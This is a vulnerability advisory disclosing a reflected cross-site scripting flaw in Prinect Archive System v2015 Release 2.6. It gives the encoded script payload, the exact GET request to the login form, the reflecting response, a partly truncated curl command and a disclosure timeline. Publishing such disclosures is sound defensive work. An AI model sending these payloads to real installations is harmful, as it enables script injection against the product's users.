Prinect Archive System 2015 Release 2.6 Cross Site Scripting

Prinect Archive System 2015 release 2.6 suffers from a cross site scripting vulnerability.

MD5 | c500c6c3f1bb4607bbccb4f6eeaec79f

Software: Prinect Archive System
Version: v2015 Release 2.6
Advisory report:

A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6

The user supplied input containing JavaScript is echoed back in JavaScript code in an HTML response via the "TextField" parameter.

Proof of concept

Reflected XSS
Payload: %3cscript%3ealert(1)%3c%2fscript%3e

The offending GET request is:

GET /am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2 HTTP/1.1
Host: victim_IP:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F

Reflected XSS Reponse:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 04 Feb 2019 13:15:12 GMT
Connection: close


id="msgContainer">Authentication failed for: <script>alert(1)</script> <br/>Click Help button for more information about login permissions.</div>

# curl -i -s -k -X GET

-H "Host: victim:8090"
-H "Accept-Encoding: gzip, deflate"
-H "Accept: */*"
-H "Accept-Language: en-US,en-GB;q=0.9,en;q=0.8"
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
-H "Connection: close"
-H "Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F"
-b "JSESSIONID=C665EA9A7594E736D39C93EA8763A01F"

Final payload into URL:


No more feedback from the vendor:

Disclosure policy
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.

This vulnerability will be published if we do not receive a response to this report with 10 days.


2019-02-04: Discovered
2019-02-25: Retest PRO environment
2019-03-25: Retest on researcher's ecosystem
2019-04-02: Vendor notification
2019-04-03: Vendor feedback received
2019-04-08: Reminder sent
2019-04-08: 2nd reminder sent
2019-04-11: Internal communication
2019-04-26: No more feedback received from the vendor
2019-05-30: New issues found
2019-06-30: Public Disclosure

Discovered by:
Alex Hernandez aka alt3kx:
Please visit for more information.

My current exploit list @exploit-db: &

Related Posts